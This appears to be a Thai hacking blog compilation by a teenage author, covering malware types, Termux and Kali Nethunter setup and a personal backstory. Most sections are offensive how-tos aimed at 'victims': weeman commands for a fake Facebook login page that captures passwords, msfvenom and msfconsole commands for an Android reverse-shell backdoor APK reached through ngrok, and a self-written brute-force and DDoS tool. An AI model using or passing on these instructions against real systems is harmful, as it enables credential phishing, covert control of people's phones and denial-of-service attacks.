DedSec CyberTeam TH

Virus Computer and Android Phone virus คือ โปรแกรม หรือ แอพพิเคชั่น ที่ประสงค์ร้าย จะทำลาย/ขโมยข้อมูล หรือทำให้ HardWare เสียหาย ชนิดของไว้รัส 1.Trojan คือไวรัสที่จะทำหน้าที่เป็นตัวเชื่อมทำให้แฮกเกอร์ สามารถควบคุมหรือขโมยข้อมูลของเครื่องเหยื่อได้ 2.Runsomware หรือไวรัสเรียกค่าไถ่ คือไวรัสที่ถูกสร้างขึ้นมาเพื่อเอาไว้ล็อกไฟล์ แฮกเกอร์ใช้มันล็อกไฟล์ในเครื่องเหยื่อ แล้วเรียกร้องให้จ่ายเงินมา เพื่อเป็นค่าไถ่ไฟล์ 3.WormInternet หรือ หนอนอินเตอร์เน็ต คือ ไวรัสที่จะอยู่ในอินเตอร์เน็ตคอยชอนใชเข้าเครื่องของเหยื่อ ด้วยการหาช่องโหวระบบ หรือด้วยการหารหัส(Brute Force) ไวรัสชนิดนี้ ทางกองทัพชอบใช้เพื่อทำลายโครงสร้างเพื่อฐาน และการคมนาคม ของประเทศศัตรู 4.Keyloggers คือไวรัสที่แฮกเกอร์ใช้เพื่อดัก Usernames และ Password ไวรัสชนิดนี้ จะฝังอยู่ในคีบอร์ด โดยไวรัสชนิดนี้จะบันทึกสิ่งที่เหยื่อพิมพ์แล้วส่งให้แฮกเกอร์หรือมิจฉาชีพ วิธีป้องกัน 1.ดาวโหลดและอัพเดตแอพ/โปรแกรมป้องกันไวรัส 2.อย่าดาวโหลด Add-on เบาเซอร์เยอะเกินความจำเป็น เพราะจะทำให้ช่องโหวระบบเยอะตาม 3.ถ้าเป็นไปได้  อย่ารูทเครื่อ

   อาจจะมีบางคนต้องการใช้งาน Kali Nethunter แต่ไม่สามารถรูทเครื่องได้ หรือ ติดตั้ง  TWRP Recovery ไม่ได้(ลงไม่เป็น) ผมก็จะมาแนะนำวิธีการลง Kali Nethunter แบบไม่ต้อง Root เครื่อง Kali Nethunter ทำอะไรได้บ้าง -สามารถปลดล็อกหน้าจอมือถือได้ -ใช้เป็น Bad USB, Keyboard Attack หรือ Rubber Ducky -แฮก, เตะออก, ดัก Wifi -Kali Linux VNC Server -ใช้แฮกได้เหมือ Kali วิธีติดตั้ง Kali Nethunter No Root $apt-get upgrade $apt-get install git $git clone https://github.com/Hax4us/Nethunter-In-Termux $cd Nethunter-In-Termux $chmod +x * $./Nethunter  หรือ $bash Nethunter มันก็จะติดตั้งอัตโนมัท วิธีใช้งาน $sh start.sh

weeman เป็นสคริปสำหรับทำเว็บ Facebook. ปลอม เมื่อเหยื่อกรอกอีเมลและรหัสผ่าน ข้อมูลเหล่านั้นจะแสดงใน Terminal สคริปนี้ใช้ได้ทั้งคอมและมือถือ วิธีติดตั้ง weeman $git clone https://github.com/evait-security/weeman วิธีใช้งาน $cd weeman $python2 weeman.py weeman > set url http://facebook.com weeman > set action_url http://www.facebook.com weeman > set port (ใส่ได้ตามใจเลย) weeman > run

ในบทความนี้ จะมาแสดงวิธีใช้งาน Metasploit Framework สำหรับแฮกคอมและมือถือ สิ่งแรกที่จะต้องทำคือสร้าง Playload หรือ BackDoor ไฟล์ เพื่อเอาไปติดตั้งลงในเครื่องของเหยื่อ วิธีสร้าง Playload $cd Metasploit-Framwork $ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT='ngrok port' R >  /sdcard/yourapkname.apk หมายเหตุ: คุณต้อง Forword Port ด้วย Ngrok ก่อนแล้วเอาเลขพอร์ตของ Ngrok มาใส่ หลังจากสร้าง Playload เรียบร้อยแล้ว ให้นำไปติดตั้งลงเครื่อง แล้วเข้าสู่หน้า console เพื่อทำการ Exploit เครื่องของเหยื่อ วิธี Exploit เครื่องเหยื่อ $ ./msfconsole $msf - use exploit/multi/handler $msf - set payload android/meterpreter/reverse_tcp $msf - set lhost 0.tcp.ngrok.io $msf - set lport ' your port which you have sent in ngrok  (eg. 4444)' $msf - exploit เมื่อคุณ Exploit เครื่องสำเร็จ คุณจะสามารถ ควบคุมเครื่องและดูข้อมูลของเหยื่อได้

HPAS1369 คือ Tools ที่ถูกสร้างเพื่อเอาไว้ทดสอบระบบ ถูกสร้างขึ้นโดย Zero Hacker (ผมเอง) ซึ้งสคริปนี้มีฟรีเจอร์อยู่ 4 อย่างคือ -Brute Force หารหัส -DDos Attack ยิงเว็บ ยิงเน็ต -NMap PortScanner แสกนพอร์ต NMap -Install Tools Hacking ติดตั้ง Tools อื่น คุณสามารถนำไปแฮกและทดสอบระบบได้ Tools นี้ไม่จำเป็นต้องรูท วิธีติดตั้ง $apt-get upgrade $apt-get install git python python2 $git clone https://github.com/DedSecCyber/HPAS1369 $cd HPAS1369 $sh install.sh มันก็จะติดตั้งโดยอัตโนมัท วิธีใช้ $python2 HPAS1369. py

   ผมมีนามปากกาว่า Zero Hacker ผมตอนนี้มีอายุ 15 ปี ผมเกิดที่จังหวัดกาณจนบุรี แล้วย้ายมาอยู่ที่นครสวรรค์ จุดเริ่มต้นของการเป็นแฮกเกอร์ของผมเกิดขึ้นจากเกมส์ๆหนึ่ง และพี่ AK    เรื่องมันเกิดขึ้นจากที่ผม เมื่อก่อนผมเคยเป็นนักแคสเกมส์ ตอนนั้นผมก็เห่อแคสเกมส์ตามเพื่อน ตอนนั้นผมมีคนติดตามอยู่ 27 กว่าคน ผมก็ไม่ได้คิดอะไรมาก ก็แคสเกมส์ต่อไป แต่ยอดซัพก็ยังไม่ขึ้น ผมรู้สึกเซ็ง เลยดูคนอื่นเขาแคสเกมส์ แล้วผมก็ดูนักแคสเกมส์คนหนึ่ง เขามีชื่อว่า เบนริเฟอร์ เป็นนักแคสเกมส์ชาวร็อค ที่ผมชอบดูเขาเล่นเกมส์ เขาได้เล่นเกมส์ๆหนึ่ง ชื่อเกมส์ว่า watchdog2 เนื้อเรื่องของเกมส์นั้นมันน่าสนใจ มันเกี่ยวกับกลุ่มแฮกเกอร์ที่ต่อสู้เพื่ออิสระภาพบนโลกอินเตอร์เน็ต โดยเขาใช้แค่มือถือแฮกได้เกือบทุกอย่าง ผมเห็นว่ามันดูเท่ เลยอยากเป็นแบบในเกมส์มั้ง เลยหาในยูทูป จนกระทั้งเจอแชลแนลหนึ่ง มีชื่อว่า Anachakmobile เขาได้สอนเรื่องวิธีลง Kali Linux และวิธีแฮกต่างๆ ผมเอาวิธีของเขามาลองทำในคอมโรงเรียน ดูไปทำไป จนผมเชี่ยวชาญ ต่อมาผมคิดว่า ในมือถือมันทำได้แบบคอมหรือเปล่า ผมก็เลยหาในยูทูปอีกครั้ง ปรากฎว่ามีคนสอนด้วย ชื่อแชลแนลว่า X-Tech

Kali Linux No install ผมจะมาแนะนำเว็บไซท์ที่เปิด Linux VNC Server สำหรับคนที่ต้องการใช้ Kali Linux แต่รูทไม่ได้ หรือ ติดตั้งไม่เป็น เว็บไซท์นี้ จะเปิด VNC Server ที่เป็นระบบปฏิบัติการ Linux และเราสามารถควบคุมได้ในเว็บเบาเซอร์ได้เลยโดยไม่ต้องติดตั้งตัว แอพ remote ลิ้งค์เว็บไซท์ https://linuxzoo.net Username : root Password  : kali

Kali Nethunter คืออะไร Kali Nethunter คือ Linux Rom ที่ถูกออกแบบมาให้ทำงานบน Android ได้(ไม่มีโหลดใน PlayStore) แต่รันได้แค่ Android 5.0-6.0 และต้องรูท ลิ้งค์ดาวโหลด Kali Nethunter https://www.offensive-security.com/kali-linux-nethunter-download/ วิธีติดตั้ง Kali Nethunter https://youtu.be/vKRJ85LvGiI 

Metasploit Framework คือ exploit สำหรับใช้แฮกคอมและมือถือ มี Playload หลากหลาย ซึ่งสามารถใช้ได้ทั้งคอม(Kali Linux, Parrot Security OS)และมือถือ(Termux,  GNURoot, Kali Nethunter) วิธีติดตั้ง Metasploit $apt-get upgrade $apt-get install git wget curl $wget https://gist.githubusercontent.com/Gameye98/d31055c2d71f2fa5b1fe8c7e691b998c/raw/09e43daceac3027a $sh msfinstall. sh มันก็จะติดตั้งเอง

ลิ้งค์ GitHub สำหรับลง Tools ไว้ แฮก GitHub เป็นเว็บไซท์ที่รวมซอฟแวร์และโปรแกรมต่างๆ ซึ่งสามารถเอาโปรแกรมหรือสคริปไปพัฒนาต่อได้ (แต่อาจติดลิขสิทธิ) และเราสามารถนำมาใช้ได้ ลิ้งค์สคริปสำหรับแฮก DosThunder https://github.com/DedSecCyber/DosThunder HPAS1369 https://github.com/DedSecCyber/HPAS1369 Lazymux https://github.com/Gameye98/Lazymux

Termux Terminal Termux คือแอพพิเคชั่น ที่เอาไว้เปิด Linux Terminal แอพนี้สามารถใช้งานได้โดยไม่ต้องรูท สามารถใช้งานได้บน Android 5.0 ขึ้นไป Termux สามารถดาวโหลดได้บน playstore Setup แอพ Termux Terminal หลังจากได้โหลดแอพ Termux มาเรียบร้อย มันจะมาแค่ตัวแอพ แต่ไม่มี Tools สำหรับแฮกเพราะฉนั้นจึงจำเป็นที่จะต้อง Setup และ Install แพ็คเก็ตที่จำเป็น คำสั่ง Setup และ Install แพ็คเก็ต $apt-get upgrade $termux-setup-storage $apt-get install git $apt-get install wget $pip install wordlist $apt-get install python python2 $apt-get install hydra $apt-get dist-upgrade คำสั่งลง Tools Scrip $git clone (ตามด้วยลิ้งค์ GitHub) $wget (ตามด้วยลิ้งค์ GitHub)